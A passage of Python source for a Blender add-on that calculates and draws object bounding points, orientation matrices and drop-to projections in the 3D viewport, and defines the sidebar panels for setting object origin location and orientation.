mu.Matrix.Identity(3)\t\n\telif spot_set_space == '2': # Local\n\t\tif not aob_check(aob)[0]:\n\t\t\tspot_orient_matrix = aob.matrix_world.to_3x3().normalized()\n\t\telif 'MESH' in [ob.type for ob in sob]:\n\t\t\tfor ob in sob:\n\t\t\t\tif ob.type == 'MESH':\n\t\t\t\t\tspot_orient_matrix = ob.matrix_world.to_3x3().normalized()\n\t\t\t\t\tbreak\n\t\telse:\n\t\t\tspot_orient_matrix = mu.Matrix.Identity(3)\n\telif spot_set_space == '3': # View\n\t\tspot_orient_matrix = bco.area.spaces.active.region_3d.view_matrix.to_3x3().inverted()\n\telif spot_set_space == '4': # Cursor\n\t\tspot_orient_matrix = bco.scene.cursor.matrix.to_3x3()\n\telse: # Preset\n\t\tif pr_values != {}:\n\t\t\teuler = mu.Euler((pr_values.get(sot.loc_rot_presets)[1]),'XYZ')\n\t\t\tspot_orient_matrix = euler.to_matrix()\n\t\telse:\n\t\t\tspot_orient_matrix = mu.Matrix.Identity(3)\n\ndef vcv(co,v,a,av,avv,avc,adv):\n\tav = a\n\tif abs(av - round(avv[v]/avc,4)) <= adv:\n\t\tavv,avc = avv+co,avc+1 \t \n\telse:\n\t\tavv,avc = co,1\n\n\treturn av,avv,avc\n\ndef spots_calc(mode,space):\n\n\tglobal spot_sob_matrices_vdata\n\tglobal spot_orient_matrix\n\tglobal spot_sps_data\n\tspot_sps_data.clear()\n\n\tfor data in spot_sob_matrices_vdata:\n\n\t\tobm = data[0]\n\t\torm = data[0].to_3x3() if space == '2' and mode != '2' else spot_orient_matrix\n\n\t\torme = orm.to_euler()\n\t\torm_unic = True if orm != mu.Matrix.Identity(3) else False\n\t\tloc = orm.inverted() @ mu.Vector(data[0].col[3][:3]) if orm_unic else mu.Vector(data[0].col[3][:3])\n\n\t\tvdata = data[1]\n\t\tfv = orm.inverted() @ Vector(vdata[0]) if orm_unic else Vector(vdata[0])\n\t\tffv = orm @ fv\n\n\t\txn,xp,yn,yp,zn,zp = round(fv[0],4),round(fv[0],4),round(fv[1],4),round(fv[1],4),round(fv[2],4),round(fv[2],4)\n\t\txnv,xpv,ynv,ypv,znv,zpv,csm = fv,fv,fv,fv,fv,fv,fv\n\t\txnc = xpc = ync = ypc = znc = zpc = 1\n\n\t\tadx = round(0.0002 + (0.0012 * (abs(orme[1]/3.1416) + abs(orme[2]/3.1416))),4)\n\t\tady = round(0.0002 + (0.0012 * (abs(orme[0]/3.1416) + abs(orme[2]/3.1416))),4)\n\t\tadz = round(0.0002 + (0.0012 * (abs(orme[0]/3.1416) + abs(orme[1]/3.1416))),4)\n\n\t\tfor vco in vdata[1:]:\n\t\t\tco = orm.inverted() @ Vector(vco) if orm_unic else Vector(vco)\n\t\t\t# x,y,z = round(co[0],4),round(co[1],4),round(co[2],4)\n\t\t\tx,y,z = co[0],co[1],co[2]\n\n\t\t\tif x >= xp - (adx*abs(xp/1000)) : xp,xpv,xpc = vcv(co,0,x,xp,xpv,xpc,adx)\n\t\t\tif x <= xn + (adx*abs(xn/1000)) : xn,xnv,xnc = vcv(co,0,x,xn,xnv,xnc,adx)\n\t\t\tif y >= yp - (ady*abs(yp/1000)) : yp,ypv,ypc = vcv(co,1,y,yp,ypv,ypc,ady)\n\t\t\tif y <= yn + (ady*abs(yn/1000)) : yn,ynv,ync = vcv(co,1,y,yn,ynv,ync,ady)\n\t\t\tif z >= zp - (adz*abs(zp/1000)) : zp,zpv,zpc = vcv(co,2,z,zp,zpv,zpc,adz)\n\t\t\tif z <= zn + (adz*abs(zn/1000)) : zn,znv,znc = vcv(co,2,z,zn,znv,znc,adz)\n\n\t\t\tcsm = csm + co\n\n\t\tboc = mu.Vector((((xn+xp)/2),((yn+yp)/2),((zn+zp)/2)))\n\t\tcom = csm/vdata.shape[0]\n\n\t\tif xnc != 1: xnv = xnv/xnc\n\t\tif xpc != 1: xpv = xpv/xpc\n\t\tif ync != 1: ynv = ynv/ync\n\t\tif ypc != 1: ypv = ypv/ypc\n\t\tif znc != 1: znv = znv/znc\n\t\tif zpc != 1: zpv = zpv/zpc\n\n\t\tsps = {'xn':xn,'xp':xp,'yn':yn,'yp':yp,'zn':zn,'zp':zp,'boc':boc,'com':com,\n\t\t\t\t'xnv':xnv,'xpv':xpv,'ynv':ynv,'ypv':ypv,'znv':znv,'zpv':zpv,'orm':orm,'loc':loc}\n\n\t\tspot_sps_data.append(sps)\n\ndef projection_calc(praxis,prdir,drp_m,drp_sm,drp_off,drp_czpb,drp_czpv):\n\n\tglobal spot_sps_data\n\tglobal spot_psp_data\n\tspot_psp_data.clear()\n\n\n\tmzp = (0,0,0)\n\tif drp_m == '1' and drp_sm == '2':\n\t\tlocs = [sps.get('loc') for sps in spot_sps_data]\n\t\tmzp = mu.Vector((0,0,0))\n\t\tfor loc in locs:\n\t\t\tmzp += loc\n\t\tmzp = mzp/len(locs)\n\n\n\tfor sps in spot_sps_data:\n\n\t\txp,xn,yp,yn,zp,zn,boc = sps.get('xp'),sps.get('xn'),sps.get('yp'),sps.get('yn'),sps.get('zp'),sps.get('zn'),sps.get('boc')\n\n\t\txc,yc,zc = boc[0],boc[1],boc[2]\n\n\t\tx = xp if prdir == '1' else xn \n\t\ty = yp if prdir == '1' else yn \n\t\tz = zp if prdir == '1' else zn \n\n\t\torm = sps.get('orm')\n\n\t\tczp = drp_czpv \n\n\t\tif orm != mu.Matrix.Identity(3): \n\t\t\tczp = orm.inverted() @ czp\n\t\tzpoint = czp if drp_czpb else (0,0,0) \n\n\t\txd = (zpoint[0] if drp_sm == '1' else mzp[0]) if drp_m == '1' else (x if drp_sm == '1' else xc)\n\t\tyd = (zpoint[1] if drp_sm == '1' else mzp[1]) if drp_m == '1' else (y if drp_sm == '1' else yc)\n\t\tzd = (zpoint[2] if drp_sm == '1' else mzp[2]) if drp_m == '1' else (z if drp_sm == '1' else zc)\n\n\t\tdtp_a = sps.get('loc')\n\t\toffset = drp_off * -1 if prdir == '1' and drp_m == '2' else drp_off\n\n\t\tif praxis == '1':\n\t\t\tdtp_b = mu.Vector((xd+offset,dtp_a[1],dtp_a[2]))\n\t\t\tdtp_c = mu.Vector((xd+offset,yd,dtp_a[2]))\n\t\t\tdtp_d = mu.Vector((xd+offset,yd,zd))\n\t\t\tdtp_e = mu.Vector((xd,yd,zd))\n\n\t\t\tbom = sps.get('xpv') if prdir == '1' else sps.get('xnv')\n\n\t\t\tpsp = {'np':mu.Vector((x,yn,zp)),'cp':mu.Vector((x,yc,zp)),'pp':mu.Vector((x,yp,zp)),\n\t\t\t\t\t'nc':mu.Vector((x,yn,zc)),'cc':mu.Vector((x,yc,zc)),'pc':mu.Vector((x,yp,zc)),\n\t\t\t\t\t'nn':mu.Vector((x,yn,zn)),'cn':mu.Vector((x,yc,zn)),'pn':mu.Vector((x,yp,zn)),\n\t\t\t\t\t'dtp_a':dtp_a,'dtp_b':dtp_b,'dtp_c':dtp_c,'dtp_d':dtp_d,'dtp_e':dtp_e,\n\t\t\t\t\t'bom':bom,'boc':boc,'com':sps.get('com')}\n\n\t\telif praxis == '2':\n\t\t\tdtp_b = mu.Vector((dtp_a[0],yd+offset,dtp_a[2]))\n\t\t\tdtp_c = mu.Vector((xd,yd+offset,dtp_a[2]))\n\t\t\tdtp_d = mu.Vector((xd,yd+offset,zd))\n\t\t\tdtp_e = mu.Vector((xd,yd,zd))\n\n\t\t\tbom = sps.get('ypv') if prdir == '1' else sps.get('ynv')\n\n\t\t\tpsp = {'np':mu.Vector((xn,y,zp)),'cp':mu.Vector((xc,y,zp)),'pp':mu.Vector((xp,y,zp)),\n\t\t\t\t\t'nc':mu.Vector((xn,y,zc)),'cc':mu.Vector((xc,y,zc)),'pc':mu.Vector((xp,y,zc)),\n\t\t\t\t\t'nn':mu.Vector((xn,y,zn)),'cn':mu.Vector((xc,y,zn)),'pn':mu.Vector((xp,y,zn)),\n\t\t\t\t\t'dtp_a':dtp_a,'dtp_b':dtp_b,'dtp_c':dtp_c,'dtp_d':dtp_d,'dtp_e':dtp_e,\n\t\t\t\t\t'bom':bom,'boc':boc,'com':sps.get('com')}\n\t\telse:\n\t\t\tdtp_b = mu.Vector((dtp_a[0],dtp_a[1],zd+offset)) \n\t\t\tdtp_c = mu.Vector((dtp_a[0],yd,zd+offset))# if dtp_a[0] >= dtp_a[1] else mu.Vector((xd,dtp_a[1],zd+drp_off))\n\t\t\tdtp_d = mu.Vector((xd,yd,zd+offset))\n\t\t\tdtp_e = mu.Vector((xd,yd,zd))\n\n\t\t\tbom = sps.get('zpv') if prdir == '1' else sps.get('znv')\n\n\t\t\tpsp = {'np':mu.Vector((xn,yp,z)),'cp':mu.Vector((xc,yp,z)),'pp':mu.Vector((xp,yp,z)),\n\t\t\t\t\t'nc':mu.Vector((xn,yc,z)),'cc':mu.Vector((xc,yc,z)),'pc':mu.Vector((xp,yc,z)),\n\t\t\t\t\t'nn':mu.Vector((xn,yn,z)),'cn':mu.Vector((xc,yn,z)),'pn':mu.Vector((xp,yn,z)),\n\t\t\t\t\t'dtp_a':dtp_a,'dtp_b':dtp_b,'dtp_c':dtp_c,'dtp_d':dtp_d,'dtp_e':dtp_e,\n\t\t\t\t\t'bom':bom,'boc':boc,'com':sps.get('com')}\n\n\t\taxis = {\n\t\t\t'xap':mu.Vector((1,0,0)),'xan':mu.Vector((-1,0,0)),\n\t\t\t'yap':mu.Vector((0,1,0)),'yan':mu.Vector((0,-1,0)),\n\t\t\t'zap':mu.Vector((0,0,1)),'zan':mu.Vector((0,0,-1))}\n\n\t\tbound = {\n\t\t\t'ba':mu.Vector((xp,yn,zp)),'bb':mu.Vector((xp,yp,zp)),'bc':mu.Vector((xp,yp,zn)),'bd':mu.Vector((xp,yn,zn)),\n\t\t\t'be':mu.Vector((xn,yn,zp)),'bf':mu.Vector((xn,yp,zp)),'bg':mu.Vector((xn,yp,zn)),'bh':mu.Vector((xn,yn,zn))}\n\n\t\tpsp = {**psp, **axis, **bound}\n\n\t\tif orm != mu.Matrix.Identity(3):\n\t\t\tfor k,v in psp.items(): psp[k] = orm @ v\n\n\t\tmatrix = {'orm':sps.get('orm')}\n\t\tpsp = {**psp, **matrix}\n\n\t\tspot_psp_data.append(psp)\n\ndef draw_this(shader,coordinates,colors,line_wifdth=1):\n\tbatch = batch_for_shader(shader, 'LINES', {\"pos\": coordinates, \"color\": colors})\n\tbgl.glLineWidth(line_wifdth)\n\tshader.bind()\n\tbatch.draw(shader)\n\tbgl.glLineWidth(1)\n\ndef color_lerp(ca,cb,n,t):\n\tif n == 0:\n\t\treturn mu.Vector(cb)\n\telse:\n\t\tfrac = (mu.Vector(cb) - mu.Vector(ca))/t\n\t\treturn mu.Vector(cb) - (frac*n) \n\ndef color_fade(color,n,t):\n\tn += 1\n\ta,b,c,d = color[0],color[1],color[2],color[3]\n\taf,bf,cf,df = (a/2)/t,(b/2)/t,(c/2)/t,(d/2)/t\n\treturn (a-(af*n),b-(bf*n),c-(cf*n),d-(df*n))\n\ndef draw_spots_main(self,context):\n\tbco = bpy.context\n\tsot = context.scene.sot_props\n\tbcv = bco.view_layer\n\taob = bco.active_object\n\tsob = bco.selected_objects\n\n\tglobal spot_mode_space_check\n\tglobal spot_projection_check\n\tglobal spot_sob_matrices_vdata\n\tglobal spot_orient_matrix\n\tglobal spot_sps_data\n\tglobal spot_psp_data\n\tglobal shapes\n\tglobal colors\n\n\tmode_or_space_recalc = False\n\tprojection_recalc = False\n\n\tmode_space = (sot.spot_set_mode,sot.spot_set_space)\n\tif spot_mode_space_check != mode_space:\n\t\tspot_mode_space_check = mode_space\n\t\tmode_or_space_recalc = True\n\n\tprojection_prms = (sot.spot_set_axis,sot.spot_set_dir,sot.drop_to_mode,sot.drop_to_smode,sot.drop_to_offset,sot.drop_custom_zero,sot.czp_x,sot.czp_y,sot.czp_z)\n\tif spot_projection_check != projection_prms:\n\t\tspot_projection_check = projection_prms\n\t\tprojection_recalc = True\n\n\tif sot.draw_spots_recalc or mode_or_space_recalc:\n\t\tmatrices_vdata_get(sot.spot_set_mode,aob,sob)\n\t\trotation_matrix_get(sot.spot_set_space,bco,sot,aob,sob)\n\t\tspots_calc(sot.spot_set_mode,sot.spot_set_space)\n\t\tprojection_recalc = True\n\n\tif projection_recalc:\n\t\tprojection_calc(sot.spot_set_axis,sot.spot_set_dir,sot.drop_to_mode,sot.drop_to_smode, \\\n\t\t\tsot.drop_to_offset,sot.drop_custom_zero,mu.Vector((sot.czp_x,sot.czp_y,sot.czp_z)))\n\n\tsot.draw_spots_recalc = False\n\n\n\ts3d = bco.space_data.region_3d\n\ta3d = bco.area.spaces.active.region_3d\n\tvmt = a3d.view_matrix.to_3x3()\n\tortho_view = True if s3d.view_perspective == 'ORTHO' else False\n\tif ortho_view: vivec = vmt.inverted() @ mu.Vector((0,0,1))\n\telse: vivec = vmt.inverted() @ (mu.Vector(a3d.view_matrix.col[3][:3]) * -1)\n\n\tgfv = []\n\tzpv = []\n\n\tif sot.spot_set_axis == '1': axicol = [colors[4],colors[5],colors[6]]\n\telif sot.spot_set_axis == '2': axicol = [colors[5],colors[4],colors[6]]\n\telse: axicol = [colors[6],colors[4],colors[5]]\n\n\tcsd = {'np':(axicol[2],2.2,shapes[3]), 'cp':(colors[0],1,shapes[2]), 'pp':(colors[0],1,shapes[2]),\n\t\t 'nc':(axicol[2],2.2,shapes[1]), 'cc':(colors[0],1,shapes[2]), 'pc':(colors[0],1,shapes[2]),\n\t\t 'nn':(axicol[0],2.2,shapes[1]), 'cn':(axicol[1],2.2,shapes[1]), 'pn':(axicol[1],2.2,shapes[1]),\n\t\t 'bom':(colors[1],2,shapes[2]), 'boc':(colors[2],3.5,shapes[2]), 'com':(colors[3],2.7,shapes[2]),\n\t\t'dtp_b':(colors[9],2,shapes[0])}\n\n\n\tshader = gpu.shader.from_builtin('3D_SMOOTH_COLOR')\n\tspot_psp_data = sorted(spot_psp_data, key=lambda e: (vmt @ e.get('boc'))[2])\n\n\tfor prd in spot_psp_data:\n\n\t\tif sot.draw_opt_bndc:\n\n\t\t\tba,bb,bc,bd,be,bf,bg,bh = prd.get('ba'),prd.get('bb'),prd.get('bc'),prd.get('bd'),prd.get('be'),prd.get('bf'),prd.get('bg'),prd.get('bh')\n\t\t\txap,xan,yap,yan,zap,zan = prd.get('xap').freeze(),prd.get('xan').freeze(),prd.get('yap').freeze(),prd.get('yan').freeze(),prd.get('zap').freeze(),prd.get('zan').freeze()\n\n\t\t\tbound = {\n\t\t\txap:[ba,bb,bb,bc,bc,bd,bd,ba],xan:[be,bf,bf,bg,bg,bh,bh,be],\n\t\t\tyap:[bf,bb,bb,bc,bc,bg,bg,bf],yan:[be,ba,ba,bd,bd,bh,bh,be],\n\t\t\tzap:[bf,bb,bb,ba,ba,be,be,bf],zan:[bg,bc,bc,bd,bd,bh,bh,bg]}\n\n\t\t\tbound_rrd, bback_crd, bback_col, bfront_crd, bfront_col = [],[],[],[],[]\n\n\t\t\tfor avec,coords in bound.items():\n\t\t\t\tif (ortho_view and avec.dot(vivec) <= 0) or ( not ortho_view and avec.dot(vivec - prd.get('boc')) <= 0):\n\t\t\t\t\tfor crd in coords:\n\t\t\t\t\t\tbback_crd.append(crd)\n\t\t\t\t\t\tbback_col.append(colors[8])\n\t\t\t\t\t\tbound_rrd.append(avec)\n\n\t\t\tfor avec,coords in bound.items():\n\t\t\t\tif not avec in bound_rrd:\n\t\t\t\t\tfor crd in coords:\n\t\t\t\t\t\tbfront_crd.append(crd)\n\t\t\t\t\t\tbfront_col.append(colors[7])\n\n\t\t\tdraw_this(shader,bback_crd,bback_col,2)\n\t\t\tdraw_this(shader,bfront_crd,bfront_col,3)\n\n\t\tif sot.draw_opt_dtpl:\n\t\t\n\t\t\tdrop_crd = [\n\t\t\t\tprd.get('dtp_a'),prd.get('dtp_b'),\n\t\t\t\tprd.get('dtp_b'),prd.get('dtp_c'),\n\t\t\t\tprd.get('dtp_c'),prd.get('dtp_d'),\n\t\t\t\tprd.get('dtp_d'),prd.get('dtp_e')] \\\n\t\t\t\tif sot.drop_to_mode == '1' else [\n\t\t\t\tprd.get('dtp_a'),prd.get('dtp_b')]\n\n\t\t\tdrop_col = [\n\t\t\t\tcolors[10],colors[10],\n\t\t\t\tcolors[11],colors[11],\n\t\t\t\tcolors[11],colors[11],\n\t\t\t\tcolors[11],colors[11],]\t\\\n\t\t\t\tif sot.drop_to_mode == '1' else [\t\t\n\t\t\t\tcolors[10],colors[10]]\n\n\t\t\tdraw_this(shader,drop_crd,drop_col,2)\n\n\t\t\tzero_crd,zero_col = [],[]\n\t\t\tscl = screen_size(bco,prd.get('dtp_e'),True) * csd.get('dtp_b')[1] * sot.draw_spots_scale\n\t\t\tfor val in shapes[4]:\n\t\t\t\t\tval = (vmt.inverted() @ (mu.Vector(val)*scl)) + prd.get('dtp_e')\t\n\t\t\t\t\tzero_crd.append(val)\n\t\t\t\t\tzero_col.append(csd.get('dtp_b')[0])\n\t\t\tdraw_this(shader,zero_crd,zero_col,6)\t\t\t\t\n\n\n\t\t\tif not sot.draw_opt_bnds:\n\t\t\t\tdtp_crd, dtp_col = [],[]\n\t\t\t\tscl = screen_size(bco,prd.get('dtp_b'),True) * csd.get('dtp_b')[1] * sot.draw_spots_scale\n\t\t\t\tfor val in csd.get('dtp_b')[2]:\n\t\t\t\t\tval = (vmt.inverted() @ (mu.Vector(val)*scl)) + prd.get('dtp_b')\t\n\t\t\t\t\tdtp_crd.append(val)\n\t\t\t\t\tdtp_col.append(csd.get('dtp_b')[0])\n\t\t\t\tdraw_this(shader,dtp_crd,dtp_col,6)\n\n\n\t\tif sot.draw_opt_bnds:\n\n\t\t\tspots = [('np',prd.get('np')),('cp',prd.get('cp')),('pp',prd.get('pp')),\n\t\t\t\t\t('nc',prd.get('nc')),('cc',prd.get('cc')),('pc',prd.get('pc')),\n\t\t\t\t\t('nn',prd.get('nn')),('cn',prd.get('cn')),('pn',prd.get('pn')),\t\n\t\t\t\t\t('bom',prd.get('bom')),('boc',prd.get('boc')),('com',prd.get('com')),('dtp_b',prd.get('dtp_b'))]\n\n\t\t\tspots = sorted(spots, key=lambda e: (vmt @ e[1])[2])\n\n\t\t\tspots_crd, spots_col = [],[]\n\t\t\tfor spt,coords in spots:\n\t\t\t\tif not sot.draw_opt_dtpl and spt == 'dtp_b':\n\t\t\t\t\tcontinue\n\t\t\t\tscl = screen_size(bco,coords,True) * csd.get(spt)[1] * sot.draw_spots_scale\n\t\t\t\tfor val in csd.get(spt)[2]:\n\t\t\t\t\tval = (vmt.inverted() @ (mu.Vector(val)*scl)) + coords\t\n\t\t\t\t\tspots_crd.append(val)\n\t\t\t\t\tspots_col.append(csd.get(spt)[0])\n\n\t\t\tdraw_this(shader,spots_crd,spots_col,6)\n\treturn\n\ndef enum_updateloc_rot_presets(self, context):\n\tsot = context.scene.sot_props\n\n\tpr_enum = []\n\tpr_num = len(pr_values)\n\tfor k,v in pr_values.items():\n\t\tn = len(pr_enum)\n\t\tnew_pr = (k, k, 'Location = ' + str(v[0]) + ' | Orientation = ' \n\t\t\t+ str((round(math.degrees(v[1][0]),4),round(math.degrees(v[1][1]),4),round(math.degrees(v[1][2]),4))), n)\n\t\tpr_enum.append(new_pr)\n\treturn pr_enum\n\ndef prop_update_draw_loc_rot_axis(self, context):\n\tif context.scene.sot_props.draw_loc_rot_axis:\n\t\tbpy.ops.fgt.sot_draw_loc_rot_axis('INVOKE_DEFAULT')\n\treturn\n\ndef prop_update_draw_loc_rot_presets(self, context):\n\tif context.scene.sot_props.draw_loc_rot_presets:\n\t\tbpy.ops.fgt.sot_draw_loc_rot_presets('INVOKE_DEFAULT')\n\treturn\n\ndef prop_update_loc_mode(self, context):\n\tsot = context.scene.sot_props\n\tglobal loc_mode_current\t\n\n\tif loc_mode_current != sot.loc_mode:\n\t\tloc_mode_current = sot.loc_mode\n\t\tif sot.loc_mode == '2':\n\t\t\tbpy.ops.fgt.sot_convert_local('EXEC_DEFAULT')\n\treturn\n\ndef prop_update_loc_ltr(self, context):\n\tsot = context.scene.sot_props\n\n\tbpy.ops.fgt.sot_convert_from_local('EXEC_DEFAULT')\n\treturn\n\ndef prop_update_rot(self, context):\n\tsot = context.scene.sot_props\n\tglobal rot_update\n\n\tif sot.loc_mode == '2':\n\t\trot_update = 3\n\t\tbpy.ops.fgt.sot_convert_local('EXEC_DEFAULT')\n\treturn\n\ndef prop_update_spot_set_pick(self, context):\n\tsot = context.scene.sot_props\n\tif sot.spot_set_pick == '2' and (sot.spot_set_mode == '3' or sot.spot_set_mode == '4'):\n\t\tif sot.spot_set_mode == '4': sot.spot_set_mode = '2'\n\t\telif sot.spot_set_mode == '3': sot.spot_set_mode = '1'\n\treturn\n\ndef prop_update_draw_spots(self, context):\n\tsot = context.scene.sot_props\n\tif sot.draw_spots:\n\t\tsot.draw_spots_recalc = True\n\t\tbpy.ops.fgt.sot_draw_spots('INVOKE_DEFAULT')\n\treturn\n\ndef prop_update_draw_spots_recalc(self,context):\n\tsot = context.scene.sot_props\n\tif not sot.draw_spots and sot.draw_spots_recalc:\n\t\tsot.draw_spots_recalc = False\n\treturn\n\ndef spt_prms(sot,spt_name,drop = False):\n\tif drop: return sot.spot_set_mode, sot.spot_set_not_active, sot.spot_set_axis, sot.spot_set_dir, sot.spot_set_space, spt_name, \\\n\t\tsot.drop_to_mode, sot.drop_to_smode, sot.drop_to_offset, sot.drop_custom_zero, mu.Vector((sot.czp_x,sot.czp_y,sot.czp_z))\n\telse: return sot.spot_set_mode, sot.spot_set_not_active, sot.spot_set_axis, sot.spot_set_dir, sot.spot_set_space, spt_name\n\n\n\n\n# UI PANEL -------------------------------------------------------------------------------------\n\n\n\n\n\nclass SOT_PT_Panel(bpy.types.Panel):\n\tbl_label = 'SOT'\n\tbl_idname = 'SOT_PT_Panel'\n\tbl_space_type = 'VIEW_3D'\n\tbl_region_type = 'UI'\n\tbl_category = 'FGT'\n\n\tdef draw(self, context):\n\t\tlayout = self.layout\n\nclass SOT_PT_Location_Orientation(bpy.types.Panel):\n\tbl_label = 'Location & Orientation'\n\tbl_idname = 'SOT_PT_Location_Orientation'\n\tbl_space_type = 'VIEW_3D'\n\tbl_region_type = 'UI'\n\tbl_category = 'FGT'\n\tbl_parent_id = 'SOT_PT_Panel'\n\tbl_options = {'DEFAULT_CLOSED'}\n\n\tdef draw(self, context):\n\t\tsot = context.scene.sot_props\n\t\tsts = context.scene.tool_settings\n\t\tget = 'fgt.sot_get_transform'\n\n\t\tlayout = self.layout\n\t\tcol = layout.column(align=True)\n\n\t\tif context.mode == 'OBJECT':\n\t\t\tcol.prop(sts, 'use_transform_data_origin', icon= 'TRANSFORM_ORIGINS', text= 'Manual Origin Transform', toggle= True)\n\t\tcol.separator(factor=1)\n\n\t\trow = col.row(align=True)\n\t\trow.operator(get, icon='PIVOT_CURSOR', text='Get Cursor')\t\t\t\t\t\t\t.prm_get_transform = 'lr_c'\n\t\trow.operator(get, icon='ORIENTATION_LOCAL', text='Get Active')\t\t\t\t\t\t.prm_get_transform = 'lr_a'\n\n\t\trow = col.row(align=True)\n\t\trow.label(text= 'Set Origin:')\n\t\tif pr_values != {}: row.prop(sot, 'loc_rot_from_preset', text= 'From Preset', icon='PASTEFLIPDOWN', toggle= True)\n\n\t\tprval = True if sot.loc_rot_from_preset and pr_values != {} else False\n\n\t\trow = col.row(align=True)\n\t\tset_loc = row.operator('fgt.sot_set_origin_loc_rot', icon='ORIENTATION_GLOBAL', text='Location')\n\t\tset_loc.prm_set_loc_rot = 'Loc'\n\t\tset_loc.prm_set_act_bat = sot.loc_rot_active_batch\n\t\tset_loc.prm_set_location = pr_values.get(sot.loc_rot_presets)[0] if prval else mu.Vector((sot.loc_x,sot.loc_y,sot.loc_z))\n\t\tset_loc.prm_set_rotation = pr_values.get(sot.loc_rot_presets)[1] if prval else mu.Vector((sot.rot_x,sot.rot_y,sot.rot_z))\n\t\tset_rot = row.operator('fgt.sot_set_origin_loc_rot', icon='ORIENTATION_GIMBAL', text='Orientation')\n\t\tset_rot.prm_set_loc_rot = 'Rot'\n\t\tset_rot.prm_set_act_bat = sot.loc_rot_active_batch\n\t\tset_rot.prm_set_location = pr_values.get(sot.loc_rot_presets)[0] if prval else mu.Vector((sot.loc_x,sot.loc_y,sot.loc_z))\n\t\tset_rot.prm_set_rotation = pr_values.get(sot.loc_rot_presets)[1] if prval else mu.Vector((sot.rot_x,sot.rot_y,sot.rot_z))\n\n\t\tset_both = col.operator('fgt.sot_set_origin_loc_rot', icon='ORIENTATION_LOCAL', text='Location + Orientation')\n\t\tset_both.prm_set_loc_rot = 'Loc + Rot'\n\t\tset_both.prm_set_act_bat = sot.loc_rot_active_batch\n\t\tset_both.prm_set_location = pr_values.get(sot.loc_rot_presets)[0] if prval else mu.Vector((sot.loc_x,sot.loc_y,sot.loc_z))\n\t\tset_both.prm_set_rotation = pr_values.get(sot.loc_rot_presets)[1] if prval else mu.Vector((sot.rot_x,sot.rot_y,sot.rot_z))\n\t\tcol.separator(factor=1)\n\n\t\trow = col.row(align=True)\n\t\trow.prop_enum(sot, 'loc_rot_active_batch', icon= 'DOT', value= '1')\n\t\trow.prop_enum(sot, 'loc_rot_active_batch', icon= 'LIGHTPROBE_GRID', value= '2')\n\t\trow = col.row(align=True)\n\t\trow.prop(sot, 'draw_loc_rot_axis', text= 'Hide Helper Axis' if sot.draw_loc_rot_axis else 'Show Helper Axis', icon='EMPTY_AXIS', toggle= True)\n\n\nclass SOT_PT_Location(bpy.types.Panel):\n\tbl_label = 'Location'\n\tbl_idname = 'SOT_PT_Location'\n\tbl_space_type = 'VIEW_3D'\n\tbl_region_type = 'UI'\n\tbl_category = 'FGT'\n\tbl_parent_id = 'SOT_PT_Location_Orientation'\n\tbl_options = {'DEFAULT_CLOSED'}\n\n\tdef draw(self, context):\n\t\tsot = context.scene.sot_props\n\t\tclear = 'fgt.sot_clear_value'\n\t\tget = 'fgt.sot_get_transform'\n\n\t\tlayout = self.layout\n\t\tcol = layout.column(align=True)\n\n\t\trow = col.row(align=True)\n\t\tset_loc = row.operator('fgt.sot_set_origin_loc_rot', icon='ORIENTATION_GLOBAL', text='Set Origin Location')\n\t\tset_loc.prm_set_loc_rot = 'Loc'\n\t\tset_loc.prm_set_act_bat = sot.loc_rot_active_batch\n\t\tset_loc.prm_set_location = mu.Vector((sot.loc_x,sot.loc_y,sot.loc_z))\n\t\tcol.separator(factor=1)\n\n\t\trow = col.row(align=True)\n\t\trow.prop_enum(sot, 'loc_mode', icon= 'ORIENTATION_GLOBAL' ,value= '1')\n\t\trow.prop_enum(sot, 'loc_mode', icon= 'ORIENTATION_LOCAL' ,value= '2')\n\n\t\tif sot.loc_mode == '1':\n\t\t\trow = col.row(align=True)\n\t\t\trow.prop(sot, 'loc_x', text= 'X')\n\t\t\trow.operator(clear, icon='X' if sot.loc_x != 0 else 'DOT', text='')\t\t\t\t.cop = 'loc_x'\n\t\t\trow = col.row(align=True)\n\t\t\trow.prop(sot, 'loc_y', text= 'Y')\n\t\t\trow.operator(clear, icon='X' if sot.loc_y != 0 else 'DOT', text='')\t\t\t\t.cop = 'loc_y'\n\t\t\trow = col.row(align=True)\n\t\t\trow.prop(sot, 'loc_z', text= 'Z')\n\t\t\trow.operator(clear, icon='X' if sot.loc_z != 0 else 'DOT', text='')\t\t\t\t.cop = 'loc_z'\t\n\t\telse:\n\t\t\trow = col.row(align=True)\n\t\t\trow.prop(sot, 'loc_x_ltr', text= 'X')\n\t\t\trow.operator(clear, icon='X' if sot.loc_x_ltr != 0 else 'DOT', text='')\t\t\t.cop = 'loc_x_ltr'\n\t\t\trow = col.row(align=True)\n\t\t\trow.prop(sot, 'loc_y_ltr', text= 'Y')\n\t\t\trow.operator(clear, icon='X' if sot.loc_y_ltr != 0 else 'DOT', text='')\t\t\t.cop = 'loc_y_ltr'\n\t\t\trow = col.row(align=True)\n\t\t\trow.prop(sot, 'loc_z_ltr', text= 'Z')\n\t\t\trow.operator(clear, icon='X' if sot.loc_z_ltr != 0 else 'DOT', text='')\t\t\t.cop = 'loc_z_ltr'\n\n\t\trow = col.row(align=True)\n\t\trow.operator(get, icon='PIVOT_CURSOR', text='Get Cursor')\t\t\t\t\t\t\t.prm_get_transform = 'loc_c'\n\t\trow.operator(get, icon='PIVOT_ACTIVE', text='Get Active')\t\t\t\t\t\t\t.prm_get_transform = 'loc_a'\n\t\tnot_zero = True if sot.loc_x != 0 or sot.loc_y != 0 or sot.loc_z != 0 else False\n\t\tif sot.loc_mode == '1':\n\t\t\trow.operator(clear, icon='X' if not_zero else 'DOT', text='')\t\t\t\t\t.cop = 'multi loc_x loc_y loc_z'\n\t\telse:\n\t\t\trow.operator(clear, icon='X' if not_zero else 'DOT', text='')\t\t\t\t\t.cop = 'multi loc_x_ltr loc_y_ltr loc_z_ltr'\n\n\nclass SOT_PT_Orientation(bpy.types.Panel):\n\tbl_label = 'Orientation'\n\tbl_idname = 'SOT_PT_Orientation'\n\tbl_space_type = 'VIEW_3D'\n\tbl_region_type = 'UI'\n\tbl_category = 'FGT'\n\tbl_parent_id = 'SOT_PT_Location_Orientation'\n\tbl_options = {'DEFAULT_CLOSED'}\n\n\tdef draw(self, context):\n\t\tsot = context.scene.sot_props\n\t\trotate = 'fgt.sot_rotate_ninety'\n\t\tclear = 'fgt.sot_clear_value'\n\t\tget = 'fgt.sot_get_transform'\n\n\t\tzax_dic = {'z+':'rem_zp','z-':'rem_zn','y+':'rem_yp','y-':'rem_yn','x+':'rem_xp','x-':'rem_xn'}\n\t\trem_dic = 